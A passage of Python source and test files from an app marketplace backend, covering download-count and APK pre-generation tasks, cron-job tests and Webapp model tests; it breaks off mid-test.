    """Refresh weekly and total install counts for the given apps from
    Monolith/Elasticsearch, saving only when a value actually changed."""
    client = get_monolith_client()
    count = 0

    for app in Webapp.objects.filter(id__in=ids).no_transforms():

        appid = {'app-id': app.id}

        # Get weekly downloads.
        query = {
            'query': {'match_all': {}},
            'facets': {
                'installs': {
                    'date_histogram': {
                        'value_field': 'app_installs',
                        'interval': 'week',
                        'key_field': 'date',
                    },
                    'facet_filter': {
                        'and': [
                            {'term': appid},
                            {'range': {'date': {
                                'gte': days_ago(8).date().strftime('%Y-%m-%d'),
                                'lte': days_ago(1).date().strftime('%Y-%m-%d'),
                            }}}
                        ]
                    }
                }
            },
            'size': 0}

        try:
            resp = client.raw(query)
            # If we query monolith with interval=week and the past 7 days
            # crosses a Monday, Monolith splits the counts into two. We want
            # the sum over the past week so we need to `sum` these.
            weekly = sum(
                c['total'] for c in
                resp.get('facets', {}).get('installs', {}).get('entries')
                if c.get('total'))
        except Exception as e:
            task_log.info('Call to ES failed: {0}'.format(e))
            weekly = 0

        # Get total downloads.
        query = {'query': {'match_all': {}},
                 'facets': {
                     'installs': {
                         'statistical': {'field': 'app_installs'},
                         'facet_filter': {'term': appid}}},
                 'size': 0}
        try:
            resp = client.raw(query)
            total = resp.get('facets', {}).get('installs', {}).get('total', 0)
        except Exception as e:
            task_log.info('Call to ES failed: {0}'.format(e))
            total = 0

        # Update Webapp object, if needed.
        update = False
        signal = False
        if weekly != app.weekly_downloads:
            update = True
            signal = True
        if total != app.total_downloads:
            update = True

        if update:
            # Note: Calling `update` will trigger a reindex on the app if
            # `_signal` is True. Since we only index `weekly_downloads`, we
            # can skip reindexing if this hasn't changed.
            count += 1
            app.update(weekly_downloads=weekly, total_downloads=total,
                       _signal=signal)

    task_log.info('App downloads updated for %s out of %s apps.'
                  % (count, len(ids)))
class PreGenAPKError(Exception):
    """
    An error encountered while trying to pre-generate an APK.

    Raised by pre_generate_apk() when the app has no manifest URL or the
    APK factory request fails.
    """
@task
@use_master
def pre_generate_apk(app_id, **kw):
    """Ask the APK factory to pre-generate an APK for the given app.

    Raises PreGenAPKError if the app has no manifest URL or the factory
    request fails. The returned APK blob itself is discarded.
    """
    app = Webapp.objects.get(pk=app_id)
    manifest_url = app.get_manifest_url()
    task_log.info('pre-generating APK for app {a} at {url}'
                  .format(a=app, url=manifest_url))
    if not manifest_url:
        raise PreGenAPKError('Webapp {w} has an empty manifest URL'
                             .format(w=app))
    try:
        res = requests.get(settings.PRE_GENERATE_APK_URL,
                           params={'manifestUrl': manifest_url})
        res.raise_for_status()
    except RequestException as exc:
        # `except ... as` is valid on Python 2.6+ and 3.x, unlike the old
        # comma form which is Python-2-only.
        raise PreGenAPKError('Error pre-generating APK for app {a} at {url}; '
                             'generator={gen} (SSL cert ok?); '
                             '{e.__class__.__name__}: {e}'
                             .format(a=app, url=manifest_url, e=exc,
                                     gen=settings.PRE_GENERATE_APK_URL))

    # The factory returns a binary APK blob but we don't need it.
    res.close()
    del res
########NEW FILE########
__FILENAME__ = test_crons
# -*- coding: utf-8 -*-
import os
import time
from datetime import date, datetime, timedelta
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
import mock
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from devhub.models import ActivityLog
from users.models import UserProfile
import mkt
from mkt.api.models import Nonce
from mkt.site.fixtures import fixture
from mkt.webapps.cron import (clean_old_signed, mkt_gc, update_app_trending,
update_downloads)
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import _get_trending
class TestWeeklyDownloads(amo.tests.TestCase):
    """Tests for the update_downloads task's weekly/total install counters."""

    def setUp(self):
        self.app = Webapp.objects.create(type=amo.ADDON_WEBAPP,
                                         status=amo.STATUS_PUBLIC)

    def get_app(self):
        # Re-fetch so we see values written by the task.
        return Webapp.objects.get(pk=self.app.pk)

    @mock.patch('mkt.webapps.tasks.get_monolith_client')
    def test_weekly_downloads(self, _mock):
        client = mock.Mock()
        raw = {
            'facets': {
                'installs': {
                    '_type': 'date_histogram',
                    'entries': [
                        {'count': 3,
                         'time': 1390780800000,
                         'total': 19.0},
                        {'count': 62,
                         'time': 1391385600000,
                         'total': 236.0}
                    ]
                }
            }
        }
        client.raw.return_value = raw
        _mock.return_value = client

        eq_(self.app.weekly_downloads, 0)

        update_downloads([self.app.pk])

        self.app.reload()
        # 19 + 236: the two histogram buckets are summed.
        eq_(self.app.weekly_downloads, 255)

    @mock.patch('mkt.webapps.tasks.get_monolith_client')
    def test_total_downloads(self, _mock):
        client = mock.Mock()
        raw = {
            'facets': {
                'installs': {
                    u'_type': u'statistical',
                    u'count': 49,
                    u'total': 6638.0
                }
            }
        }
        client.raw.return_value = raw
        _mock.return_value = client

        eq_(self.app.total_downloads, 0)

        update_downloads([self.app.pk])

        self.app.reload()
        eq_(self.app.total_downloads, 6638)

    @mock.patch('mkt.webapps.tasks.get_monolith_client')
    def test_monolith_error(self, _mock):
        client = mock.Mock()
        client.side_effect = ValueError
        client.raw.side_effect = Exception
        _mock.return_value = client

        update_downloads([self.app.pk])

        # Failures leave the counters untouched at zero.
        self.app.reload()
        eq_(self.app.weekly_downloads, 0)
        eq_(self.app.total_downloads, 0)
class TestCleanup(amo.tests.TestCase):
    """Tests for clean_old_signed(), which prunes old reviewer-signed apps."""

    def setUp(self):
        self.file = os.path.join(settings.SIGNED_APPS_REVIEWER_PATH,
                                 '1', 'x.z')

    def test_not_cleaned(self):
        # A freshly written file is younger than the default age cutoff.
        storage.open(self.file, 'w')
        clean_old_signed()
        assert storage.exists(self.file)

    def test_cleaned(self):
        # A negative cutoff makes every file "old enough" to be removed.
        storage.open(self.file, 'w')
        clean_old_signed(-60)
        assert not storage.exists(self.file)
@mock.patch('lib.crypto.packaged.sign_app')
class TestSignApps(amo.tests.TestCase):
    """Tests for the `sign_apps` management command."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.app = Addon.objects.get(id=337141)
        self.app.update(is_packaged=True)
        self.app2 = amo.tests.app_factory(
            name=u'Mozillaball ょ', app_slug='test',
            is_packaged=True, version_kw={'version': '1.0',
                                          'created': None})
        self.app3 = amo.tests.app_factory(
            name='Test app 3', app_slug='test3', status=amo.STATUS_REJECTED,
            is_packaged=True, version_kw={'version': '1.0',
                                          'created': None})

    def test_by_webapp(self, sign_mock):
        v1 = self.app.get_version()
        call_command('sign_apps', webapps=str(v1.pk))
        file1 = v1.all_files[0]
        # Bug fix: `assert sign_mock.called_with(...)` always passed because
        # `called_with` is an auto-created child mock (truthy). Check the
        # recorded call arguments instead, as test_all does.
        eq_(len(sign_mock.mock_calls), 1)
        eq_(sign_mock.mock_calls[0][1][:2],
            (file1.file_path, file1.signed_file_path))

    def test_all(self, sign_mock):
        v1 = self.app.get_version()
        v2 = self.app2.get_version()
        call_command('sign_apps')
        file1 = v1.all_files[0]
        file2 = v2.all_files[0]
        eq_(len(sign_mock.mock_calls), 2)
        eq_(sign_mock.mock_calls[0][1][:2],
            (file1.file_path, file1.signed_file_path))
        eq_(sign_mock.mock_calls[1][1][:2],
            (file2.file_path, file2.signed_file_path))
class TestUpdateTrending(amo.tests.TestCase):
    """Tests for _get_trending() and the update_app_trending cron."""

    def setUp(self):
        self.app = Webapp.objects.create(type=amo.ADDON_WEBAPP,
                                         status=amo.STATUS_PUBLIC)

    @mock.patch('mkt.webapps.tasks._get_trending')
    def test_trending_saved(self, _mock):
        _mock.return_value = 12.0
        update_app_trending()

        eq_(self.app.get_trending(), 12.0)
        for region in mkt.regions.REGIONS_DICT.values():
            eq_(self.app.get_trending(region=region), 12.0)

        # Test running again updates the values as we'd expect.
        _mock.return_value = 2.0
        update_app_trending()
        eq_(self.app.get_trending(), 2.0)
        for region in mkt.regions.REGIONS_DICT.values():
            eq_(self.app.get_trending(region=region), 2.0)

    @mock.patch('mkt.webapps.tasks.get_monolith_client')
    def test_get_trending(self, _mock):
        client = mock.Mock()
        client.return_value = [
            {'count': 133.0, 'date': date(2013, 8, 26)},
            {'count': 122.0, 'date': date(2013, 9, 2)},
        ]
        _mock.return_value = client

        # 1st week count: 133 + 122 = 255
        # Prior 3 weeks get averaged: (133 + 122) / 3 = 85
        # (255 - 85) / 85 = 2.0
        eq_(_get_trending(self.app.id), 2.0)

    @mock.patch('mkt.webapps.tasks.get_monolith_client')
    def test_get_trending_threshold(self, _mock):
        client = mock.Mock()
        client.return_value = [
            {'count': 49.0, 'date': date(2013, 8, 26)},
            {'count': 50.0, 'date': date(2013, 9, 2)},
        ]
        _mock.return_value = client

        # 1st week count: 49 + 50 = 99
        # 99 is less than 100 so we return 0.0.
        eq_(_get_trending(self.app.id), 0.0)

    @mock.patch('mkt.webapps.tasks.get_monolith_client')
    def test_get_trending_monolith_error(self, _mock):
        client = mock.Mock()
        client.side_effect = ValueError
        _mock.return_value = client
        # Monolith errors are swallowed; trending falls back to 0.0.
        eq_(_get_trending(self.app.id), 0.0)
@mock.patch('os.stat')
@mock.patch('os.listdir')
@mock.patch('os.remove')
class TestGarbage(amo.tests.TestCase):
    """Tests for the mkt_gc garbage-collection cron."""

    def setUp(self):
        self.user = UserProfile.objects.create(
            email='[email protected]', name='gc_test')
        amo.log(amo.LOG.CUSTOM_TEXT, 'testing', user=self.user,
                created=datetime(2001, 1, 1))

    def test_garbage_collection(self, rm_mock, ls_mock, stat_mock):
        # The ancient (2001) activity log entry gets purged.
        eq_(ActivityLog.objects.all().count(), 1)
        mkt_gc()
        eq_(ActivityLog.objects.all().count(), 0)

    def test_nonce(self, rm_mock, ls_mock, stat_mock):
        # Nonces older than a day are purged.
        nonce = Nonce.objects.create(nonce='a', timestamp=1, client_key='b')
        nonce.update(created=self.days_ago(2))
        eq_(Nonce.objects.count(), 1)
        mkt_gc()
        eq_(Nonce.objects.count(), 0)

    def test_dump_delete(self, rm_mock, ls_mock, stat_mock):
        # A dump file with a very old mtime is removed...
        ls_mock.return_value = ['lol']
        stat_mock.return_value = StatMock(days_ago=1000)

        mkt_gc()
        assert rm_mock.call_args_list[0][0][0].endswith('lol')

    def test_new_no_delete(self, rm_mock, ls_mock, stat_mock):
        # ...while a recent one is kept.
        ls_mock.return_value = ['lol']
        stat_mock.return_value = StatMock(days_ago=1)

        mkt_gc()
        assert not rm_mock.called
class StatMock(object):
    """Stand-in for an os.stat() result: fixed size, mtime `days_ago`
    days in the past."""

    def __init__(self, days_ago):
        then = datetime.now() - timedelta(days_ago)
        self.st_mtime = time.mktime(then.timetuple())
        self.st_size = 100
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import functools
import hashlib
import json
import os
import shutil
import unittest
import uuid
import zipfile
from datetime import datetime, timedelta
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.db.models.signals import post_delete, post_save
from django.test.utils import override_settings
from django.utils.translation import ugettext_lazy as _
import mock
import pyelasticsearch
from elasticutils.contrib.django import S
from nose.tools import eq_, ok_, raises
import amo
import mkt
from addons.models import (Addon, AddonCategory, AddonDeviceType,
BlacklistedSlug, Category, Preview, version_changed)
from addons.signals import version_changed as version_changed_signal
from amo.helpers import absolutify
from amo.tests import app_factory, version_factory
from amo.utils import to_language
from constants.applications import DEVICE_TYPES
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from editors.models import EscalationQueue, RereviewQueue
from files.models import File
from files.utils import WebAppParser
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from lib.iarc.utils import (DESC_MAPPING, INTERACTIVES_MAPPING,
REVERSE_DESC_MAPPING, REVERSE_INTERACTIVES_MAPPING)
from mkt.constants import apps
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
from mkt.site.tests import DynamicBoolFieldsTestMixin
from mkt.submit.tests.test_views import BasePackagedAppTest, BaseWebAppTest
from mkt.webapps.models import (AddonExcludedRegion, AppFeatures, AppManifest,
ContentRating, Geodata, get_excluded_in,
IARCInfo, Installed, RatingDescriptors,
RatingInteractives, Webapp, WebappIndexer)
from mkt.prices.models import AddonPremium, Price
from users.models import UserProfile
from versions.models import update_status, Version
class TestWebapp(amo.tests.TestCase):
fixtures = fixture('prices')
def add_payment_account(self, app, provider_id, user=None):
if not user:
user = UserProfile.objects.create(email='a', username='b')
payment = PaymentAccount.objects.create(
solitude_seller=SolitudeSeller.objects.create(user=user,
uuid=uuid.uuid4()),
provider=provider_id,
user=user,
seller_uri=uuid.uuid4(),
uri=uuid.uuid4())
return AddonPaymentAccount.objects.create(
addon=app, payment_account=payment, product_uri=uuid.uuid4())
def test_delete_reason(self):
"""Test deleting with a reason gives the reason in the mail."""
reason = u'trêason'
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
w.name = u'é'
eq_(len(mail.outbox), 0)
w.delete(msg='bye', reason=reason)
eq_(len(mail.outbox), 1)
assert reason in mail.outbox[0].body
def test_soft_deleted(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
eq_(len(Webapp.objects.all()), 1)
eq_(len(Webapp.with_deleted.all()), 1)
w.delete('boom shakalakalaka')
eq_(len(Webapp.objects.all()), 0)
eq_(len(Webapp.with_deleted.all()), 1)
# When an app is deleted its slugs and domain should get relinquished.
post_mortem = Webapp.with_deleted.filter(id=w.id)
eq_(post_mortem.count(), 1)
for attr in ('slug', 'app_slug', 'app_domain'):
eq_(getattr(post_mortem[0], attr), None)
def test_with_deleted_count(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
w.delete()
eq_(Webapp.with_deleted.count(), 1)
def test_soft_deleted_valid(self):
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
Webapp.objects.create(status=amo.STATUS_DELETED)
eq_(list(Webapp.objects.valid()), [w])
eq_(sorted(Webapp.with_deleted.valid()), [w])
def test_delete_incomplete_with_deleted_version(self):
"""Test deleting incomplete add-ons with no public version attached."""
app = app_factory()
app.current_version.delete()
eq_(Version.objects.count(), 0)
eq_(Version.with_deleted.count(), 1)
app.update(status=0, highest_status=0)
# We want to be in the worst possible situation, no direct foreign key
# to the deleted versions, do we call update_version() now that we have
# an incomplete app.
app.update_version()
eq_(app.latest_version, None)
eq_(app.current_version, None)
app.delete()
# The app should have been soft-deleted.
eq_(len(mail.outbox), 1)
eq_(Webapp.objects.count(), 0)
eq_(Webapp.with_deleted.count(), 1)
def test_webapp_type(self):
webapp = Webapp()
webapp.save()
eq_(webapp.type, amo.ADDON_WEBAPP)
def test_app_slugs_separate_from_addon_slugs(self):
Addon.objects.create(type=1, slug='slug')
webapp = Webapp(app_slug='slug')
webapp.save()
eq_(webapp.slug, 'app-%s' % webapp.id)
eq_(webapp.app_slug, 'slug')
def test_app_slug_collision(self):
Webapp(app_slug='slug').save()
w2 = Webapp(app_slug='slug')
w2.save()
eq_(w2.app_slug, 'slug-1')
w3 = Webapp(app_slug='slug')
w3.save()
eq_(w3.app_slug, 'slug-2')
def test_app_slug_blocklist(self):
BlacklistedSlug.objects.create(name='slug')
w = Webapp(app_slug='slug')
w.save()
eq_(w.app_slug, 'slug~')
def test_geodata_upon_app_creation(self):
app = Webapp.objects.create(type=amo.ADDON_WEBAPP)
assert app.geodata, (
'Geodata was not created with Webapp.')
def test_get_url_path(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_url_path(), '/app/woo/')
def test_get_api_url(self):
webapp = Webapp(app_slug='woo', pk=1)
self.assertApiUrlEqual(webapp.get_api_url(), '/apps/app/woo/')
def test_get_api_url_pk(self):
webapp = Webapp(pk=1)
self.assertApiUrlEqual(webapp.get_api_url(pk=True), '/apps/app/1/')
def test_get_stats_url(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_stats_url(), '/statistics/app/woo')
def test_get_comm_thread_url(self):
self.create_switch('comm-dashboard')
app = app_factory(app_slug='putain')
eq_(app.get_comm_thread_url(), '/comm/app/putain')
def test_get_origin(self):
url = 'http://www.xx.com:4000/randompath/manifest.webapp'
webapp = Webapp(manifest_url=url)
eq_(webapp.origin, 'http://www.xx.com:4000')
def test_get_packaged_origin(self):
webapp = Webapp(app_domain='app://foo.com', is_packaged=True,
manifest_url='')
eq_(webapp.origin, 'app://foo.com')
def test_punicode_domain(self):
webapp = Webapp(app_domain=u'http://www.allizôm.org')
eq_(webapp.punycode_app_domain, 'http://www.xn--allizm-mxa.org')
    def test_reviewed(self):
        # A blank Webapp is not flagged as unreviewed.
        assert not Webapp().is_unreviewed()
    def test_cannot_be_purchased(self):
        # Without public status the premium flag alone is not enough.
        eq_(Webapp(premium_type=True).can_be_purchased(), False)
        eq_(Webapp(premium_type=False).can_be_purchased(), False)
    def test_can_be_purchased(self):
        # Purchasable only when public *and* premium.
        w = Webapp(status=amo.STATUS_PUBLIC, premium_type=True)
        eq_(w.can_be_purchased(), True)
        w = Webapp(status=amo.STATUS_PUBLIC, premium_type=False)
        eq_(w.can_be_purchased(), False)
    def test_get_previews(self):
        # Previews at position >= 0 are listed; the promo (position -1)
        # is filtered out.
        w = Webapp.objects.create()
        eq_(w.get_promo(), None)
        p = Preview.objects.create(addon=w, position=0)
        eq_(list(w.get_previews()), [p])
        p.update(position=-1)
        eq_(list(w.get_previews()), [])
    def test_get_promo(self):
        # Only a preview at position -1 counts as the promo.
        w = Webapp.objects.create()
        eq_(w.get_promo(), None)
        p = Preview.objects.create(addon=w, position=0)
        eq_(w.get_promo(), None)
        p.update(position=-1)
        eq_(w.get_promo(), p)
    def test_mark_done_pending(self):
        # mark_done() moves a fresh app into the unreviewed queue status.
        w = Webapp()
        eq_(w.status, amo.STATUS_NULL)
        w.mark_done()
        eq_(w.status, amo.WEBAPPS_UNREVIEWED_STATUS)
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_no_icon_in_manifest(self, get_manifest_json):
        webapp = Webapp()
        get_manifest_json.return_value = {}
        eq_(webapp.has_icon_in_manifest(), False)
    @mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
    def test_has_icon_in_manifest(self, get_manifest_json):
        webapp = Webapp()
        get_manifest_json.return_value = {'icons': {}}
        eq_(webapp.has_icon_in_manifest(), True)
    def test_no_version(self):
        # Without a current version there is no manifest to fetch.
        webapp = Webapp()
        eq_(webapp.get_manifest_json(), None)
        eq_(webapp.current_version, None)
    def test_has_premium(self):
        # has_premium() is True whenever a premium object exists,
        # even at price 0.
        webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
        webapp._premium = mock.Mock()
        webapp._premium.price = 1
        eq_(webapp.has_premium(), True)
        webapp._premium.price = 0
        eq_(webapp.has_premium(), True)
    def test_get_price_no_premium(self):
        # Premium type but no attached premium/price object.
        webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
        eq_(webapp.get_price(), None)
        eq_(webapp.get_price_locale(), None)
    def test_get_price(self):
        webapp = amo.tests.app_factory()
        self.make_premium(webapp)
        eq_(webapp.get_price(region=mkt.regions.US.id), 1)
    def test_get_price_tier(self):
        webapp = amo.tests.app_factory()
        self.make_premium(webapp)
        eq_(str(webapp.get_tier().price), '1.00')
        ok_(webapp.get_tier_name())
    def test_get_price_tier_no_charge(self):
        # A zero-priced tier still has a tier object and name.
        webapp = amo.tests.app_factory()
        self.make_premium(webapp, 0)
        eq_(str(webapp.get_tier().price), '0')
        ok_(webapp.get_tier_name())
    def test_has_no_premium(self):
        webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
        webapp._premium = None
        eq_(webapp.has_premium(), False)
    def test_not_premium(self):
        eq_(Webapp().has_premium(), False)
    def test_get_region_ids_no_exclusions(self):
        # This returns IDs for the *included* regions.
        eq_(Webapp().get_region_ids(), mkt.regions.REGION_IDS)
    def test_get_region_ids_with_exclusions(self):
        # Excluded regions are removed per-app from the full region list.
        w1 = Webapp.objects.create()
        w2 = Webapp.objects.create()
        AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
        AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
        AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
        w1_regions = list(mkt.regions.REGION_IDS)
        w1_regions.remove(mkt.regions.BR.id)
        w1_regions.remove(mkt.regions.US.id)
        w2_regions = list(mkt.regions.REGION_IDS)
        w2_regions.remove(mkt.regions.UK.id)
        eq_(sorted(Webapp.objects.get(id=w1.id).get_region_ids()),
            sorted(w1_regions))
        eq_(sorted(Webapp.objects.get(id=w2.id).get_region_ids()),
            sorted(w2_regions))
    def test_get_regions_no_exclusions(self):
        # This returns the class definitions for the *included* regions.
        eq_(sorted(Webapp().get_regions()),
            sorted(mkt.regions.REGIONS_CHOICES_ID_DICT.values()))
    def test_get_regions_with_exclusions(self):
        # Same as above but asserting on region classes, not ids.
        w1 = Webapp.objects.create()
        w2 = Webapp.objects.create()
        AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
        AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
        AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
        all_regions = mkt.regions.REGIONS_CHOICES_ID_DICT.values()
        w1_regions = list(all_regions)
        w1_regions.remove(mkt.regions.BR)
        w1_regions.remove(mkt.regions.US)
        w2_regions = list(all_regions)
        w2_regions.remove(mkt.regions.UK)
        eq_(sorted(Webapp.objects.get(id=w1.id).get_regions()),
            sorted(w1_regions))
        eq_(sorted(Webapp.objects.get(id=w2.id).get_regions()),
            sorted(w2_regions))
    def test_package_helpers(self):
        app1 = app_factory()
        eq_(app1.is_packaged, False)
        app2 = app_factory(is_packaged=True)
        eq_(app2.is_packaged, True)
    def test_package_no_version(self):
        # A hosted app (manifest URL, no packaged version) is not packaged.
        webapp = Webapp.objects.create(manifest_url='http://foo.com')
        eq_(webapp.is_packaged, False)
    def test_assign_uuid(self):
        # Saving assigns a UUID guid automatically.
        app = Webapp()
        eq_(app.guid, None)
        app.save()
        assert app.guid is not None, (
            'Expected app to have a UUID assigned to guid')
    @mock.patch.object(uuid, 'uuid4')
    def test_assign_uuid_max_tries(self, mock_uuid4):
        # With uuid4 pinned to an already-taken value, saving must give up.
        guid = 'abcdef12-abcd-abcd-abcd-abcdef123456'
        mock_uuid4.return_value = uuid.UUID(guid)
        # Create another webapp with and set the guid.
        Webapp.objects.create(guid=guid)
        # Now `assign_uuid()` should fail.
        app = Webapp()
        with self.assertRaises(ValueError):
            app.save()
    def test_is_premium_type_upgrade_check(self):
        # Free apps may upgrade to anything else; free-inapp to anything
        # but the two free types; paid types may not "upgrade" at all.
        app = Webapp()
        ALL = set(amo.ADDON_FREES + amo.ADDON_PREMIUMS)
        free_upgrade = ALL - set([amo.ADDON_FREE])
        free_inapp_upgrade = ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP])
        # Checking ADDON_FREE changes.
        app.premium_type = amo.ADDON_FREE
        for pt in ALL:
            eq_(app.is_premium_type_upgrade(pt), pt in free_upgrade)
        # Checking ADDON_FREE_INAPP changes.
        app.premium_type = amo.ADDON_FREE_INAPP
        for pt in ALL:
            eq_(app.is_premium_type_upgrade(pt), pt in free_inapp_upgrade)
        # All else is false.
        for pt_old in ALL - set([amo.ADDON_FREE, amo.ADDON_FREE_INAPP]):
            app.premium_type = pt_old
            for pt_new in ALL:
                eq_(app.is_premium_type_upgrade(pt_new), False)
    @raises(ValueError)
    def test_parse_domain(self):
        # Packaged apps have no manifest URL to derive a domain from.
        Webapp(is_packaged=True).parsed_app_domain
    def test_app_type_hosted(self):
        eq_(Webapp().app_type, 'hosted')
    def test_app_type_packaged(self):
        eq_(Webapp(is_packaged=True).app_type, 'packaged')
    @mock.patch('versions.models.Version.is_privileged', True)
    def test_app_type_privileged(self):
        # Have to use `app_factory` because we need a `latest_version`
        # to make it a privileged version.
        eq_(app_factory(is_packaged=True).app_type, 'privileged')
    def test_nomination_new(self):
        # Moving to pending sets a nomination date on the latest version.
        app = app_factory()
        app.update(status=amo.STATUS_NULL)
        app.versions.latest().update(nomination=None)
        app.update(status=amo.STATUS_PENDING)
        assert app.versions.latest().nomination
    def test_nomination_rejected(self):
        # Re-nominating a rejected app refreshes the nomination date.
        app = app_factory()
        app.update(status=amo.STATUS_REJECTED)
        app.versions.latest().update(nomination=self.days_ago(1))
        app.update(status=amo.STATUS_PENDING)
        self.assertCloseToNow(app.versions.latest().nomination)
    def test_nomination_pkg_pending_new_version(self):
        # New versions while pending inherit version nomination.
        app = app_factory()
        app.update(status=amo.STATUS_PENDING, is_packaged=True)
        old_ver = app.versions.latest()
        old_ver.update(nomination=self.days_ago(1))
        old_ver.all_files[0].update(status=amo.STATUS_PENDING)
        v = Version.objects.create(addon=app, version='1.9')
        eq_(v.nomination, old_ver.nomination)
    def test_nomination_pkg_public_new_version(self):
        # New versions while public get a new version nomination.
        app = app_factory()
        app.update(is_packaged=True)
        old_ver = app.versions.latest()
        old_ver.update(nomination=self.days_ago(1))
        v = Version.objects.create(addon=app, version='1.9')
        self.assertCloseToNow(v.nomination)
    def test_nomination_public_waiting(self):
        # New versions while public waiting get a new version nomination.
        app = app_factory()
        app.update(is_packaged=True, status=amo.STATUS_PUBLIC_WAITING)
        old_ver = app.versions.latest()
        old_ver.update(nomination=self.days_ago(1))
        old_ver.all_files[0].update(status=amo.STATUS_PUBLIC_WAITING)
        v = Version.objects.create(addon=app, version='1.9')
        self.assertCloseToNow(v.nomination)
    def test_excluded_in(self):
        # Explicit AddonExcludedRegion rows show up in get_excluded_in().
        app1 = app_factory()
        region = mkt.regions.BR
        AddonExcludedRegion.objects.create(addon=app1, region=region.id)
        self.assertSetEqual(get_excluded_in(region.id), [app1.id])
    def test_excluded_in_iarc(self):
        # IARC geodata flags exclude the app from BR and DE respectively.
        app = app_factory()
        geodata = app._geodata
        geodata.update(region_br_iarc_exclude=True,
                       region_de_iarc_exclude=True)
        self.assertSetEqual(get_excluded_in(mkt.regions.BR.id), [app.id])
        self.assertSetEqual(get_excluded_in(mkt.regions.DE.id), [app.id])
    def test_excluded_in_iarc_de(self):
        # Only the DE flag set: excluded from DE, still visible in BR.
        app = app_factory()
        geodata = app._geodata
        geodata.update(region_br_iarc_exclude=False,
                       region_de_iarc_exclude=True)
        self.assertSetEqual(get_excluded_in(mkt.regions.BR.id), [])
        self.assertSetEqual(get_excluded_in(mkt.regions.DE.id), [app.id])
    def test_excluded_in_usk_exclude(self):
        # A USK (German ratings body) exclusion only affects DE.
        app = app_factory()
        geodata = app._geodata
        geodata.update(region_de_usk_exclude=True)
        self.assertSetEqual(get_excluded_in(mkt.regions.BR.id), [])
        self.assertSetEqual(get_excluded_in(mkt.regions.DE.id), [app.id])
    def test_supported_locale_property(self):
        app = app_factory()
        app.versions.latest().update(supported_locales='de,fr', _signal=False)
        app.reload()
        eq_(app.supported_locales,
            (u'English (US)', [u'Deutsch', u'Fran\xe7ais']))
    def test_supported_locale_property_empty(self):
        app = app_factory()
        eq_(app.supported_locales, (u'English (US)', []))
    def test_supported_locale_property_bad(self):
        # Unknown locale codes ('xx') are dropped from the listing.
        app = app_factory()
        app.versions.latest().update(supported_locales='de,xx', _signal=False)
        app.reload()
        eq_(app.supported_locales, (u'English (US)', [u'Deutsch']))
    def test_supported_locale_app_rejected(self):
        """
        Simulate an app being rejected, which sets the
        app.current_version to None, and verify supported_locales works
        as expected -- which is that if there is no current version we
        can't report supported_locales for it, so we return an empty
        list.
        """
        app = app_factory()
        app.versions.latest().update(supported_locales='de', _signal=False)
        app.update(status=amo.STATUS_REJECTED)
        app.versions.latest().all_files[0].update(status=amo.STATUS_REJECTED)
        app.update_version()
        app.reload()
        eq_(app.supported_locales, (u'English (US)', []))
    def test_get_trending(self):
        # Test no trending record returns zero.
        app = app_factory()
        eq_(app.get_trending(), 0)
        # Add a region specific trending and test the global one is returned
        # because the region is not mature.
        region = mkt.regions.REGIONS_DICT['me']
        app.trending.create(value=20.0, region=0)
        app.trending.create(value=10.0, region=region.id)
        eq_(app.get_trending(region=region), 20.0)
        # Now test the regional trending is returned when adolescent=False.
        region.adolescent = False
        eq_(app.get_trending(region=region), 10.0)
    @mock.patch('mkt.webapps.models.cache.get')
    def test_is_offline_when_packaged(self, mock_get):
        # Packaged apps are always considered offline-capable.
        mock_get.return_value = ''
        eq_(Webapp(is_packaged=True).is_offline, True)
        eq_(Webapp(is_packaged=False).is_offline, False)
    def test_is_offline_when_appcache_path(self):
        app = app_factory()
        manifest = {'name': 'Swag'}
        # If there's no appcache_path defined, ain't an offline-capable app.
        am = AppManifest.objects.create(version=app.current_version,
                                        manifest=json.dumps(manifest))
        eq_(app.is_offline, False)
        # If there's an appcache_path defined, this is an offline-capable app.
        manifest['appcache_path'] = '/manifest.appcache'
        am.update(manifest=json.dumps(manifest))
        # reload isn't enough, it doesn't clear cached_property.
        app = Webapp.objects.get(pk=app.pk)
        eq_(app.is_offline, True)
    @mock.patch('mkt.webapps.models.Webapp.completion_errors')
    def test_completion_errors(self, complete_mock):
        # completion_error_msgs() flattens the per-section error dict.
        app = app_factory()
        complete_mock.return_value = {
            'details': ['1', '2'],
            'payments': 'pc load letter'
        }
        eq_(app.completion_error_msgs(), ['1', '2', 'pc load letter'])
        assert not app.is_fully_complete()
        complete_mock.return_value = {}
        eq_(app.completion_error_msgs(), [])
        assert app.is_fully_complete()
    @mock.patch('mkt.webapps.models.Webapp.payments_complete')
    @mock.patch('mkt.webapps.models.Webapp.content_ratings_complete')
    @mock.patch('mkt.webapps.models.Webapp.details_complete')
    def test_next_step(self, detail_step, rating_step, pay_step):
        # Each incomplete step points at its dev URL, in submission order.
